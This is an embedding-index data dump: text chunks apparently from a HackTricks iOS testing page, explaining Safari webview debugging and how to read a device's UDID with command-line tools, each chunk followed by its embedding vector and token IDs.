webviews, messages passed to console. log ( ) are not printed to the xcode logs. it's still relatively easy to debug web content with safari's developer tools, although there are a couple of limitations : debugging ios webviews requires safari, so your dev computer must be running macos. you can only debug webviews in applications loaded onto your device through xcode. you can't debug webviews in apps installed through the app store or apple configurator. with those limitations in mind, here are the steps to remotely debug a webview in ios : first, enable the safari web inspector on your ios device by opening the ios settings app, navigating to settings > safari > advanced, and toggling the web inspector option on. ios safari settingsnext, you must also enable developer tools in safari on your dev computer. launch safari on your dev machine and navigate to safari > preferences in the menu bar. in the preferences pane that appears, click on the advanced tab and then enable the show develop menu option at the bottom. after you do that, you can close the preferences pane. mac safari settingsconnect your ios device to your dev computer and launch your app. in safari on your dev computer, click on develop in the menu bar and hover over the dropdown option that is your ios device's name to show a list of webview instances running on your ios device. mac safari develop menuclick the dropdown option for the webview that you wish to debug. this will open a new safari web inspector window for inspecting the webview. safari web inspector window [SEP]
[ -0.06827468425035477, -0.044011615216732025, -0.3905080556869507, -0.08712199330329895, -0.31207460165023804, 0.3834923207759857, 0.007843119092285633, 0.3121799826622009, 0.8995493650436401, 1.0185664892196655, -0.1523481011390686, 0.16710209846496582, 0.5109512209892273, 0.15951098501682281, -0.010573857463896275, -0.7957301735877991, 0.03293127194046974, -0.3560086190700531, -0.7738072872161865, 0.04592859372496605, 0.2584070861339569, 0.8094503879547119, -0.9385821223258972, -0.08930870145559311, -0.9827547669410706, 0.20768678188323975, -0.4509529173374176, -0.6982268691062927, 1.1732776165008545, 0.6783446669578552, -0.8161377906799316, 0.21579031646251678, -0.29947200417518616, -0.17884542047977448, 0.3930595815181732, -0.4087015986442566, 0.17872534692287445, -0.12070981413125992, -0.7965435981750488, -0.7324191927909851, -0.09605317562818527, 0.06250117719173431, 0.4878738224506378, -0.9154009222984314, -0.4780019223690033, -0.48685458302497864, -0.06523396819829941, -0.2821662127971649, -0.2892463803291321, 0.8208979368209839, 0.32481881976127625, 0.3794369399547577, -0.5673003792762756, 0.27337342500686646, -0.3582208454608917, 0.2594096064567566, -0.587605357170105, -0.291963130235672, -1.086915135383606, 0.3081492781639099, 0.5163832306861877, 0.9705454111099243, 0.4637904465198517, -0.383095383644104, 0.3653315305709839, 0.36394092440605164, -0.494163453578949, -1.0610270500183105, -0.18425919115543365, 0.04125211015343666, -0.09736757725477219, 0.9807933568954468, -0.3136739730834961, -1.1037107706069946, -0.9726248383522034, -0.0754782184958458, 0.05123366788029671, -0.03498251736164093, 0.1945725381374359, 1.222815990447998, -0.1311105340719223, 0.8654859066009521, 0.4022340774536133, 0.1473037153482437, -0.9231776595115662, -0.25556686520576477, -0.07658514380455017, -0.802622377872467, -0.38307586312294006, 0.015550157055258751, -0.05616248771548271, 0.5028578639030457, -0.5841943621635437, -0.01290207076817751, 1.16647207736969, 0.7527596354484558, 0.03031185269355774, -0.22373932600021362, -0.4797419607639313, 0.12758088111877441, 0.1385035365819931, 1.0400605201721191, -0.28987908363342285, 0.1308140605688095, -0.9689844250679016, 0.029905594885349274, 0.7675642371177673, -0.2613027095794678, -1.0283101797103882, -1.236416220664978, 0.3668118715286255, 0.35620731115341187, -0.27678245306015015, 0.033251628279685974, 0.0755886659026146, -0.1100674644112587, 0.2271265834569931, -0.5667369961738586, -0.46260493993759155, 0.2866024374961853, 0.3217424154281616, 0.1201476901769638, -0.026815399527549744, -0.7190313935279846, -0.0634162425994873, 0.7289615273475647, 0.10747560113668442, 1.267208218574524, -0.3738667070865631, 0.16760210692882538, 0.1841452568769455, 0.0707959458231926, 0.43595102429389954, 0.6289453506469727, -0.36823537945747375, -0.5458858013153076, -0.0729096308350563, -0.7692727446556091, 0.37938985228538513, -0.24914057552814484, 0.2133447378873825, -0.33139535784721375, -0.6336902976036072, 1.0699591636657715, 0.48497700691223145, -0.041573431342840195, -0.8071912527084351, -0.6939260363578796, -0.2061355710029602, -0.10434877127408981, 0.25528720021247864, -0.12150026112794876, -0.17146795988082886, -0.5929389595985413, 0.15802477300167084, -0.3785731792449951, -0.31885823607444763, 0.54184889793396, 0.8220955729484558, 0.5115609765052795, -0.3763390779495239, 1.4712462425231934, -0.7017875909805298, 0.3999839127063751, -0.966688871383667, 0.19470150768756866, -0.6713712811470032, -0.43492141366004944, -0.033398423343896866, -0.15236018598079681, 0.5075164437294006, 0.25977176427841187, -0.605999231338501, -0.02300185337662697, 1.1139503717422485, -0.39111000299453735, 0.03715406358242035, 0.14301954209804535, -0.1958024501800537, 0.559137761592865, -0.2713239789009094, 0.8794037699699402, 0.8743641972541809, 0.033617131412029266, 0.05701432749629021, 0.4695504903793335, -0.0514671690762043, -0.19897039234638214, -0.7871672511100769, -0.10343330353498459, 0.7337858080863953, 0.71585613489151, -0.6775420904159546, -0.3855069577693939, -0.29758480191230774, 0.13797642290592194, -0.8840136528015137, 0.01235697977244854, -0.03103022463619709, -0.6927874088287354, -0.2780221402645111, 0.07866452634334564, -0.350010484457016, -0.1049906313419342, -0.0435720793902874, -0.4387778341770172, 0.09469985961914062, 0.08073261380195618, -0.7623584866523743, 0.26779600977897644, 0.2883242070674896, -0.3747538924217224, -1.115283727645874, 0.17559166252613068, 0.1868179887533188, -0.4587712287902832, 0.10572127997875214, -0.386223703622818, 0.3233088552951813, -0.4365922808647156, 0.5675265192985535, 0.6230272650718689, 1.0495294332504272, 0.1275940239429474, -0.3130701780319214, 0.23810943961143494, 0.32724833488464355, -0.29854366183280945, -0.2993718087673187, 0.2231990396976471, -0.09033016115427017, 0.30472442507743835, -0.0024383747950196266, 0.7481863498687744, 0.4792976379394531, 0.1362292319536209, 0.358872652053833, -0.14574554562568665, 0.7010738849639893, 0.044546712189912796, -0.152139350771904, 0.37192463874816895, -0.3462022542953491, -0.30827802419662476, 0.07152004539966583, 0.17750684916973114, -0.1785159707069397, 0.21853899955749512, 0.29035484790802, 0.10763631016016006, -0.5110964775085449, 0.7644230723381042, 1.0811221599578857, -1.069368839263916, -0.3927357792854309, -0.5194119811058044, 0.19233685731887817, 1.4410532712936401, -0.7605708241462708, 0.2699805796146393, -0.11088409274816513, 0.13805770874023438, 0.32579144835472107, 0.2834163010120392, -0.17668156325817108, 0.33507704734802246, -0.02467253804206848, 0.48854807019233704, -0.6926417946815491, -0.8659325242042542, -0.22665953636169434, -0.14804358780384064, -0.6807567477226257, 0.3554166257381439, -1.234424352645874, 0.44004225730895996, 1.232978105545044, -0.6582333445549011, 0.20672713220119476, -0.5049132704734802, 0.7641106843948364, 0.24245308339595795, 0.30947262048721313, 0.3213691711425781, 0.24664455652236938, 0.7312548160552979, -0.4919699430465698, 0.03614352270960808, -0.10960281640291214, 1.2192699909210205, -0.4625430405139923, 0.15665116906166077, -0.401812344789505, -0.47626298666000366, 0.389721155166626, -0.6244391798973083, 0.45178210735321045, 0.1489783376455307, -0.5576072335243225, 0.19121576845645905, 0.047895703464746475, 0.27982935309410095, 0.3050037622451782, 0.7201561331748962, -0.33074766397476196, 1.2078067064285278, 0.15319737792015076, 0.07189162820577621, 0.30271512269973755, 0.46284613013267517, 0.0436285138130188, 0.4278801381587982, -0.16863946616649628, 0.2530576288700104, -0.1403270661830902, 0.22766177356243134, 0.548626184463501, 0.14427003264427185, -0.4392002522945404, 0.4730949103832245, -0.5342268347740173, -1.0838570594787598, -0.40205296874046326, -0.5149754881858826, -0.013239783234894276, 0.6616672873497009, 0.4499015510082245, -0.7242531776428223, -0.09033787995576859, -0.9015638828277588, -0.2661491632461548, 0.2726939916610718, 0.8552646636962891, 1.127806305885315, 0.5552386045455933, -0.06594129651784897, 0.12549546360969543, 0.13533562421798706, 0.06640948355197906, 0.29904964566230774, 0.6131496429443359, -0.26938480138778687, 0.1103883683681488, 0.41578635573387146, -0.28925758600234985, -0.5841356515884399, -0.32220885157585144, -1.1592931747436523, 0.5114762783050537, 0.21815122663974762, -1.1135144233703613, -0.461366206407547, -0.15117968618869781, 0.2408405989408493, 0.7430261969566345, 0.6651986241340637, -0.7485895752906799, -0.08468867093324661, 0.1861741691827774, 0.2893487811088562, 0.17975784838199615, 0.0689089372754097, 0.023144379258155823, 0.6060231924057007, -0.11396746337413788, -0.38312163949012756, -0.1716209501028061, 0.9255906343460083, 0.4986227750778198, 0.16395951807498932, 0.3193090856075287, 0.08504945784807205, -0.07012557983398438, 0.5792186260223389, -0.2952139675617218, -0.7768734097480774, 1.0579516887664795, 0.07675844430923462, 0.23746635019779205, 0.5131673216819763, -0.013477013446390629, -0.23459890484809875, 0.07769986242055893, 0.6888774633407593, 0.03871023654937744, -0.4284447431564331, -0.8454248309135437, -0.5163930058479309, -0.11094015091657639, -0.16255243122577667, 0.23325106501579285, 0.1420583575963974, 0.6907162070274353, -0.2104150354862213, -0.8479728102684021, -1.1252714395523071, -0.05669571831822395, -0.08960490673780441, 0.6685073375701904, -0.08701902627944946, 0.39790183305740356, 0.12343738973140717, -0.17363908886909485, -0.305163711309433, -0.7730304002761841, 0.040874212980270386, -0.6023734211921692, 0.3167029321193695, 0.2187887579202652, 0.5484716892242432, -0.2549132704734802, 0.2288488745689392, -0.3160238265991211, 0.15373054146766663, -0.02200406603515148, -0.6999226212501526, -0.44791579246520996, 0.6378490924835205, -0.04059506580233574, -0.31689438223838806, -0.2707633376121521, -0.06043626740574837, 0.07203574478626251, -0.5142778158187866, 0.5266814827919006, -0.26663848757743835, 0.17337198555469513, -0.14014023542404175, 0.24877509474754333, 0.22252915799617767, -0.057423170655965805, -0.24457792937755585, -0.5168888568878174, -0.40404045581817627, -0.9171949028968811, 0.40700608491897583, 1.310280203819275, 0.3522369861602783, -0.4364422559738159, -0.7784708738327026, -0.13505731523036957, 0.31821009516716003, -0.7569501399993896, 0.021475378423929214, 0.21688945591449738, 0.05585871636867523, 0.6823514699935913, -0.34673166275024414, 0.21343474090099335, 0.0034277881495654583, 0.5778141617774963, -1.3527621030807495, 0.8706583976745605, -0.4705082178115845, -1.141465663909912, -0.8236379623413086, 1.0843425989151, -0.687670111656189, 0.4597242772579193, -0.25268757343292236, 0.11209475994110107, 0.5422196984291077, -0.1706158071756363, 0.16600601375102997, -0.9061457514762878, 0.8218667507171631, 0.07809032499790192, 0.05957675352692604, 0.3629484176635742, 0.29375696182250977, -0.4012647569179535, 0.9296278953552246, -0.4372434914112091, -0.07906405627727509, -0.03918542340397835, -0.7517099380493164, 0.2879152297973633, -0.15367449820041656, -0.563369870185852, 0.36388757824897766, -1.1602044105529785, 0.4249722361564636, -0.20239733159542084, 0.26156309247016907, -0.9272466897964478, -0.608154833316803, -0.3419766128063202, -0.29257017374038696, 0.43604353070259094, 0.8232651352882385, 0.2807633578777313, -0.18306061625480652, -0.5065883994102478, 0.035654861479997635, -0.4768320620059967, -0.020730067044496536, -0.6888106465339661, -0.9550215005874634, 0.3428356945514679, -0.058569490909576416, 0.49904876947402954, -0.3720237910747528, -0.8544270396232605, 0.2485411912202835, 0.09744812548160553, -0.3278745412826538, -0.2511841952800751, 0.11864697933197021, 0.4372182786464691, 0.534302294254303, 0.10130050033330917, 0.39253416657447815, 0.47330620884895325, -0.32368505001068115, 0.047642361372709274, 0.1644943505525589, -0.1811169981956482, 0.28029611706733704, 0.3820425868034363, 0.47416481375694275, 0.7894721031188965, -0.34187716245651245, -0.17759111523628235, 0.4191863536834717, 0.026149427518248558, 0.07589882612228394, 0.23263202607631683, -1.421567678451538, -0.40032967925071716, 0.4946122467517853, 0.6157843470573425, -0.15007397532463074, 0.18958353996276855, -0.31357520818710327, -0.35853809118270874, -0.2568873167037964, 0.6128219962120056, -0.039755791425704956, -0.3563660979270935, 0.20811687409877777, 0.1281605064868927, 0.13449476659297943, -0.5858557820320129, -0.16680718958377838, -0.03786725550889969, -0.1631018966436386, -0.7107773423194885, 0.38965776562690735, 0.0024384481366723776, 0.01168104074895382, -0.2502692639827728, 0.06527700275182724, 0.4965382218360901, -0.18267932534217834, -0.7816168665885925, -0.06564779579639435, -0.5360249876976013, -0.07397592812776566, -0.11153186112642288, 0.38003748655319214, -0.22661469876766205, -0.0780029147863388, -0.303276926279068, 0.5052065253257751, -0.14461490511894226, 0.13347509503364563, -0.44439762830734253, 0.44767341017723083, 0.30801451206207275, -0.2096477746963501, 0.5256948471069336, -0.26771172881126404, 0.9197529554367065, -0.12978827953338623, -0.06017691269516945, -0.5740236639976501, 0.049503788352012634, -0.2591063976287842, -0.025417044758796692, 0.480325311422348, -0.3668919801712036, 0.2297310084104538, -0.4838545322418213, -0.11685780435800552, 0.4603210985660553, -0.40809425711631775, 0.7572256922721863, 0.43537673354148865, -0.05032193660736084, 0.4161231517791748, -1.0373060703277588, 0.9858062267303467, -0.29239335656166077, 0.2550183832645416, -0.3960844576358795, 0.423332542181015, 0.279484361410141, -0.2848934233188629, 0.03490637242794037, 0.46646323800086975, -0.35319745540618896, -0.6795282363891602, 1.0431729555130005, 0.11200255155563354, 0.31377655267715454, 0.38758620619773865, -1.2883633375167847, -0.3051440119743347, 0.4358711540699005, 0.8300328850746155, 0.44274356961250305, 0.4038911759853363, 0.22173751890659332, 0.07232200354337692, 0.4658687114715576, -0.709665060043335, -0.6860553622245789, 0.01970696821808815, 0.27807822823524475, -0.17390114068984985, -0.2504494786262512, 0.2918829321861267, -0.2680252492427826, -0.39221060276031494, -1.032463550567627, -0.14902423322200775, 0.22862093150615692, 0.24687771499156952, -0.12555082142353058, -0.23238375782966614, -0.03021494299173355, -0.2465910166501999, 0.42899954319000244, 0.4682305157184601, 0.10403741151094437, 0.16094200313091278, -0.045918069779872894, -0.5229318141937256, -0.02688285894691944, -0.5199892520904541, 0.4281136691570282, -1.2662649154663086, -0.8438037633895874, -1.1174874305725098, -0.3985678255558014, -0.40105727314949036, -0.45984575152397156, 1.333868145942688, -0.5966185927391052, 0.03786100447177887, 0.3067658543586731, 0.2989334464073181, 1.1156585216522217, 0.363467276096344, 0.5422015190124512, 0.34246373176574707, 0.30186113715171814, -0.8384941220283508, 0.11446545273065567, 0.7145917415618896, 0.32662513852119446, 0.12717610597610474, -0.05244005098938942, 0.22066840529441833, 0.34740185737609863, 0.4716189205646515, -0.6554834842681885, 0.2535509467124939, -0.19244837760925293, 0.09841220080852509, 0.28202852606773376, 0.7489400506019592, -0.3489219546318054, -0.15267229080200195, -1.0710352659225464, -0.754959225654602, -0.35126209259033203, -0.281145304441452, 0.34492138028144836, -0.341372549533844, 0.2733197808265686, -0.6224182844161987, 0.6548412442207336, -0.3564817011356354, -0.5598073601722717, -0.7382226586341858, -0.8301897048950195, -0.22360718250274658, -0.9964754581451416, -0.35791805386543274, -0.7569629549980164, -0.39414286613464355, 0.6236053705215454, -0.6172347068786621, -0.004032114986330271, -0.5479187369346619, -0.23245708644390106, 0.3139013350009918, 0.03203713148832321, -0.2255789190530777, 0.11894665658473969, 0.40589144825935364, 0.2595016658306122, 0.415933221578598, 0.549681544303894, 0.6634263396263123, 0.2886925935745239, -0.41939228773117065, 0.2943650186061859, 0.24126343429088593, -0.11725937575101852, 0.10773218423128128, 0.3962240517139435, -0.5089106559753418, 0.6714197993278503, 0.13187628984451294, -0.2608371675014496, 0.22253330051898956, 0.13143832981586456, -0.3025048077106476, 0.4230121672153473, 0.0842251405119896, 0.26238372921943665, -0.6762658357620239, 0.017397237941622734, 0.35109931230545044, -0.09885210543870926, -0.20434485375881195, -0.06051291152834892, 0.3801119923591614, 0.264642596244812, 0.8801483511924744, 0.09457149356603622, 0.11682339757680893, 0.2619972229003906, -0.3658505976200104, 0.510425865650177, -0.11060068756341934, -0.47452932596206665, 0.86721271276474, 0.06908833980560303, 0.40353474020957947, 0.7636143565177917, 0.12775148451328278, 0.9391505122184753, 0.002402685582637787, 0.9748281240463257, -0.5589566230773926, -0.2972203195095062, -0.04549555853009224, -0.470929890871048, 0.3951603174209595, -0.7312425971031189, 0.07768969982862473, -0.32727155089378357, -0.18240687251091003, -0.0073501975275576115, 0.13356246054172516, 0.7868069410324097, 0.6940399408340454, 0.16979216039180756, -0.7303161025047302, 0.08034590631723404, -0.08457720279693604, 0.028547964990139008, -0.0866597443819046, -0.5710352659225464, 0.3905542492866516, 1.159744143486023, 0.5779249668121338, -0.24411943554878235, -1.0295647382736206, -0.5711881518363953, 0.12205058336257935, 0.4721081554889679, -0.17329120635986328, -0.19606713950634003, -0.6238203048706055, 0.48617205023765564, -0.6635504961013794, 0.6639063358306885, -0.5044036507606506, 0.35872015357017517, 0.2102976143360138, -0.251827597618103, 0.18376435339450836, -0.3982793390750885, 0.1306198537349701, 0.11485214531421661, 0.42303577065467834, 0.4405595362186432, 0.1726152002811432, -0.18130476772785187, -0.3194113075733185, -0.1760021150112152, 0.4424077868461609, 0.8705617189407349, -0.3372602164745331, -0.46804481744766235, 1.1531002521514893, 0.30412691831588745, -0.8465946912765503, 0.08040089160203934, -0.1467597931623459, -0.5346181988716125, -0.5067512392997742, 0.16053543984889984, -1.0000604391098022, 0.4317948520183563, 0.7754300832748413, -0.12181254476308823, 0.07721535861492157, -0.8444077372550964, -0.5242000818252563, -0.2581767141819, -0.12838666141033173, 1.25487220287323, -0.37489232420921326, 0.6427784562110901, -0.09940925240516663, -0.09989164769649506, 0.5816007256507874, 0.39661651849746704, -0.772420346736908, 0.5933015942573547, -0.11590658873319626, 0.46592745184898376, -0.042135629802942276, 0.1296469122171402, 0.06247423589229584, 0.07867897301912308, -0.2787383496761322, -0.21110403537750244, -0.37688228487968445, 0.3501329720020294, -0.6446526050567627, -0.4497661292552948, -0.9610744118690491, 0.41868460178375244, 0.1955900639295578, -0.10927904397249222, 0.5126560926437378, -0.38934120535850525, -0.07596462965011597, -0.7022577524185181, -0.087839774787426, -0.4163969159126282, -0.48518216609954834, -0.3746563494205475, -0.05698423087596893, -1.212785243988037, 0.13754506409168243, -0.07548623532056808, 0.47983765602111816, -0.735282301902771, 0.41376057267189026, 0.26972275972366333, 0.3641071021556854, 0.31226882338523865, -0.5769845843315125, -0.18288056552410126, 0.22430139780044556, -0.11244652420282364, -0.09845910221338272, -0.40243765711784363, -0.13322468101978302, 0.0021887137554585934, -0.20634201169013977, -0.7771135568618774, 0.028261475265026093, 0.4892674684524536, -0.19884318113327026, -1.0747150182724, -0.3325648605823517, -0.8004270792007446, -0.32018548250198364, 0.04038272053003311, 0.2555069923400879, -0.15698902308940887, 0.544825553894043, -0.6782092452049255, 0.16478987038135529, 1.1774996519088745, 0.26254719495773315, -0.46311843395233154, 0.7013725638389587, -0.8664432764053345, -0.10488513112068176, 0.355459988117218, 0.08622303605079651, -0.37129896879196167, -0.5071176886558533, 0.12520448863506317, -0.4231274127960205, 0.28314030170440674, -0.12354828417301178, 0.8863379955291748, 0.9469063878059387, -0.42357540130615234, 0.22936826944351196, -0.00018597522284835577, 1.135473370552063, 0.10314814746379852, 0.6717775464057922, 0.8854529857635498, -0.8724900484085083, -0.2198876142501831, -0.15117201209068298, 0.47435906529426575, 0.2460446059703827, -0.15331155061721802, -0.18049493432044983, -0.2657220959663391, -0.5139278173446655, -0.9551007151603699, -0.20024076104164124, 0.21646028757095337, -0.22303257882595062, -0.3060450255870819, 0.17034046351909637, 0.18458981812000275, -0.6138926148414612, -0.23999956250190735, -0.3841933310031891, 0.39625680446624756, -0.5939310193061829, -0.4573589265346527, 0.5681241750717163, -1.583371877670288, 4.168933868408203, 0.6160629391670227, 0.5735092163085938, 0.7056679129600525, -0.06619739532470703, -0.020392367616295815, 0.7392365336418152, -0.23690403997898102, -0.8349980711936951, 0.23012152314186096, -0.19735759496688843, -0.0038726998027414083, 0.8479306101799011, 0.7686212062835693, -0.3072892725467682, 0.46195340156555176, -0.31777870655059814, 0.15861615538597107, -0.20258809626102448, -0.39561229944229126, -0.6040602922439575, 0.01731099560856819, -0.2240438312292099, 0.375779390335083, 0.8115618228912354, 0.15337182581424713, -0.47275686264038086, -0.8427753448486328, -0.2552795112133026, -0.7823802828788757, 1.0827653408050537, -0.21034249663352966, 0.8911870718002319, -0.19871553778648376, 0.16280166804790497, 0.9294374585151672, 0.6945516467094421, -0.7727298736572266, -0.298992782831192, 1.2553082704544067, -0.011912873946130276, -0.8228764533996582, 0.5968674421310425, -0.4626044034957886, -0.19536469876766205, 0.5501120090484619, -0.032619401812553406, -0.43251967430114746, 1.047890067100525, 0.08604474365711212, 0.049150384962558746, 0.012494399212300777, -0.22844241559505463, -0.4920714199542999, -0.4265391230583191, 0.11639150232076645, -0.1256084442138672, -0.16527387499809265, -0.5894501209259033, -0.5511286854743958, 0.20881132781505585, -0.6132012009620667, -0.07048129290342331, 0.4478129744529724, -0.39638572931289673, -0.0045371027663350105, -0.04346727579832077, 1.7674610614776611, -0.28125524520874023, -0.9828818440437317, 0.08965452015399933, 0.17726412415504456, -0.7932627201080322, -0.486645370721817, -0.08241622895002365, 0.7868325114250183, -0.2083367109298706, 0.5392201542854309, 0.41147375106811523, -1.2144241333007812, 0.3321661055088043, 0.6235793232917786, 0.11498191207647324, -0.2402576059103012, 0.9848588705062866, 0.16357852518558502, -0.05450056120753288, -0.03139141947031021, -0.26131898164749146, -0.35111409425735474, 0.2982763648033142, 0.1530824899673462, -0.25467270612716675, -0.001483535161241889, 0.5545027256011963 ]
[ 4773, 8584, 2015, 1010, 7696, 2979, 2000, 10122, 1012, 8833, 1006, 1007, 2024, 2025, 6267, 2000, 1996, 1060, 16044, 15664, 1012, 2009, 1005, 1055, 2145, 4659, 3733, 2000, 2139, 8569, 2290, 4773, 4180, 2007, 23591, 1005, 1055, 9722, 5906, 1010, 2348, 2045, 2024, 1037, 3232, 1997, 12546, 1024, 2139, 8569, 12588, 16380, 4773, 8584, 2015, 5942, 23591, 1010, 2061, 2115, 16475, 3274, 2442, 2022, 2770, 6097, 2891, 1012, 2017, 2064, 2069, 2139, 8569, 2290, 4773, 8584, 2015, 1999, 5097, 8209, 3031, 2115, 5080, 2083, 1060, 16044, 1012, 2017, 2064, 1005, 1056, 2139, 8569, 2290, 4773, 8584, 2015, 1999, 18726, 5361, 2083, 1996, 10439, 3573, 2030, 6207, 9530, 8873, 27390, 8844, 1012, 2007, 2216, 12546, 1999, 2568, 1010, 2182, 2024, 1996, 4084, 2000, 19512, 2139, 8569, 2290, 1037, 4773, 8584, 1999, 16380, 1024, 2034, 1010, 9585, 1996, 23591, 4773, 7742, 2006, 2115, 16380, 5080, 2011, 3098, 1996, 16380, 10906, 10439, 1010, 6583, 5737, 16961, 2000, 10906, 1028, 23591, 1028, 3935, 1010, 1998, 2000, 13871, 2989, 1996, 4773, 7742, 5724, 2006, 1012, 16380, 23591, 10906, 2638, 18413, 1010, 2017, 2442, 2036, 9585, 9722, 5906, 1999, 23591, 2006, 2115, 16475, 3274, 1012, 4888, 23591, 2006, 2115, 16475, 3698, 1998, 22149, 2000, 23591, 1028, 18394, 1999, 1996, 12183, 3347, 1012, 1999, 1996, 18394, 6090, 2063, 2008, 3544, 1010, 11562, 2006, 1996, 3935, 21628, 1998, 2059, 9585, 1996, 2265, 4503, 12183, 5724, 2012, 1996, 3953, 1012, 2044, 2017, 2079, 2008, 1010, 2017, 2064, 2485, 1996, 18394, 6090, 2063, 1012, 6097, 23591, 10906, 8663, 2638, 6593, 2115, 16380, 5080, 2000, 2115, 16475, 3274, 1998, 4888, 2115, 10439, 1012, 1999, 23591, 2006, 2115, 16475, 3274, 1010, 11562, 2006, 4503, 1999, 1996, 12183, 3347, 1998, 25215, 2099, 2058, 1996, 4530, 7698, 5724, 2008, 2003, 2115, 16380, 5080, 1005, 1055, 2171, 2000, 2265, 1037, 2862, 1997, 4773, 8584, 12107, 2770, 2006, 2115, 16380, 5080, 1012, 6097, 23591, 4503, 12183, 20464, 6799, 1996, 4530, 7698, 5724, 2005, 1996, 4773, 8584, 2008, 2017, 4299, 2000, 2139, 8569, 2290, 1012, 2023, 2097, 2330, 1037, 2047, 23591, 4773, 7742, 3332, 2005, 29508, 1996, 4773, 8584, 1012, 23591, 4773, 7742, 3332, 102 ]
hack_tricks
435.txt
10
[CLS] ios basic testing operationsgetting the udid of an ios deviceperform this actions having connected the device to the computer via usb and having the device unlocked. the udid is a 40 - digit unique sequence of letters and numbers to identify an ios device. you can find the udid of your ios device on macos catalina onwards in the finder app, as itunes is not available anymore in catalina. just select the connected ios device in finder and click on the information under the name of the ios device to iterate through it. besides the udid, you can find the serial number, imei and other useful information. if you are using a macos version before catalina, you can find the udid of your ios device via itunes, by selecting your device and clicking on " serial number " in the summary tab. when clicking on this you will iterate through different metadata of the ios device including its udid. it is also possible to get the udid via various command line tools on macos while the device is attached via usb : by using the i / o registry explorer tool ioreg : $ ioreg - p iousb - l | grep " usb serial " | " usb serial number " = " 9e8ada44246cee813e2f8c1407520bf2f84849ec " by using ideviceinstaller ( also available on linux ) : $ brew install ideviceinstaller $ idevice _ id - l 316f01bd160932d2bf2f95f1f142bc29b1c62dbcby using the system _ profiler : $ system _ profiler spusbdatatype | sed - n - e'/ ipad /, / serial / p ; / iphone /, / serial / p ; / ipod /, / serial / p'| grep " serial number : " 2019 - 09 - 08 10 : 18 : 03. 920 system _ profiler [ 13251 : 1050356 ] spusbdevice : iocreateplugininterfaceforservice failed 0xe00002be serial number : 64655621de6ef5e56a874d63f1e1bdd14f7103b1by using instruments : $ instruments - s devicesaccessing the device shellafter jailbreaking the device you should
[ -0.29310858249664307, -0.4972535967826843, 0.10659701377153397, 0.574046790599823, -0.07766950875520706, -0.0596562884747982, 0.014186840504407883, 0.2466897964477539, 0.6460922360420227, 0.6029307842254639, 0.16387586295604706, 0.208153635263443, -0.05530828237533569, 0.17431339621543884, -0.5624271631240845, -0.4625820815563202, -0.4447079598903656, 0.10436052083969116, -0.3111022114753723, 0.14047546684741974, -0.015545621514320374, 0.4076448380947113, -0.540037214756012, -0.5791016221046448, 0.022059060633182526, 0.9317793250083923, 0.37807711958885193, 0.10121707618236542, 0.6955351233482361, 1.0018508434295654, 0.06267549842596054, -0.4466938078403473, 0.04439154639840126, -0.5880600810050964, 0.15485186874866486, -0.1519947499036789, 0.8886561989784241, -0.9201174974441528, 0.32750093936920166, -0.6442437171936035, -0.24281957745552063, -0.26421278715133667, 0.07113253325223923, -0.45761486887931824, -0.40346041321754456, -0.7425470352172852, 0.1362977921962738, -0.5591325759887695, 0.115475133061409, -0.08437050133943558, -0.4787457585334778, -0.11717867851257324, -0.641686737537384, 0.44511428475379944, 0.8273800015449524, -0.14418770372867584, 0.26789605617523193, -0.6086081862449646, -0.33123281598091125, 0.3441489040851593, 0.24654792249202728, 0.4194047451019287, 0.6247234344482422, -0.5509552359580994, -0.33558207750320435, 0.245833620429039, -0.7791509628295898, -0.760761022567749, -0.6326068639755249, -0.17016924917697906, 0.2269187718629837, 0.7963303923606873, -0.2002781629562378, -0.8799631595611572, -0.23012417554855347, -0.0950419157743454, 0.23859542608261108, -0.6516436338424683, 0.28871071338653564, 0.8507850766181946, 0.04760776460170746, 1.0371909141540527, 0.13759565353393555, -0.4631686210632324, -0.3501816391944885, 0.060084279626607895, 0.3594779670238495, 0.3784799873828888, -0.5613730549812317, 0.02436492219567299, 0.45422327518463135, 0.5923497080802917, -0.8243798017501831, -0.16906972229480743, 0.7402902841567993, 0.4759761691093445, -0.26989391446113586, -0.2318899780511856, 0.10175848752260208, -0.18564791977405548, 0.24004243314266205, 0.6702346801757812, -0.015136092901229858, 0.1961149126291275, -0.6655241250991821, 0.346310555934906, 0.6515463590621948, -0.6439505219459534, 0.10163915902376175, -0.7502119541168213, 0.851880669593811, -0.46608400344848633, 0.528445303440094, -0.2432144284248352, 0.04844980686903, -0.046446822583675385, 0.5917450785636902, -0.08468976616859436, -0.21778038144111633, 1.3543663024902344, -0.15258264541625977, -0.24350586533546448, 0.6791096329689026, -0.3957362174987793, -0.4723438620567322, 0.06168779358267784, 0.5550057291984558, 0.37788182497024536, -0.7604228258132935, -0.30734550952911377, -0.059959687292575836, -0.6198490262031555, -0.5162068009376526, 0.7300465106964111, -0.26293161511421204, 0.11297529935836792, -0.07301642000675201, 0.11490032821893692, 0.9303300380706787, -0.6479638814926147, -0.08139112591743469, 0.44304656982421875, -0.15487156808376312, 0.7576464414596558, 0.8574091196060181, -0.009119464084506035, -0.5966762900352478, 0.1389019638299942, -0.42751920223236084, -0.31239089369773865, -0.07004250586032867, 0.30117693543434143, 0.6132941246032715, -0.4081268012523651, -0.1427823305130005, 0.737063467502594, -0.154354527592659, 0.5991281867027283, -0.42334315180778503, 0.28762856125831604, 0.07476015388965607, 0.6489967107772827, 0.6061314344406128, -0.11569301784038544, -0.3386039733886719, -0.5869014859199524, -0.24549628794193268, -0.5699359774589539, 0.0009199900669045746, 0.10996364802122116, 0.49116215109825134, 0.2699498236179352, -0.3483031392097473, 0.3316024839878082, 1.0370323657989502, 0.6290176510810852, -0.0324975959956646, 0.5878176093101501, 0.4596017301082611, 0.764110803604126, -0.028233248740434647, 0.06305059045553207, 0.6839146018028259, 0.8146154284477234, -0.2773340344429016, 0.19886603951454163, -0.30857571959495544, -0.8288952112197876, -0.44233161211013794, -0.09592590481042862, -0.10966038703918457, 0.767065703868866, -0.38415050506591797, 0.7833315134048462, 0.560370147228241, 0.04966969043016434, -0.10762738436460495, -0.6684256792068481, -0.6109693646430969, -1.4977571964263916, -0.8793652653694153, 0.26001644134521484, -0.10119936615228653, 0.20154033601284027, -0.12967604398727417, -0.6640594601631165, 0.9046573042869568, 0.38945719599723816, -0.10195662081241608, 0.14702358841896057, 0.8673413395881653, -0.3152540922164917, -0.5059123039245605, 0.40944018959999084, 0.047489527612924576, 0.21295149624347687, 0.3874122202396393, 0.7628762722015381, -0.29394203424453735, 0.1746809482574463, 0.30197980999946594, 0.936810314655304, 0.8857612013816833, 0.10013184696435928, -0.9032109975814819, -0.7245983481407166, 0.6967878937721252, 0.470948725938797, -0.6038272380828857, 0.1419319212436676, 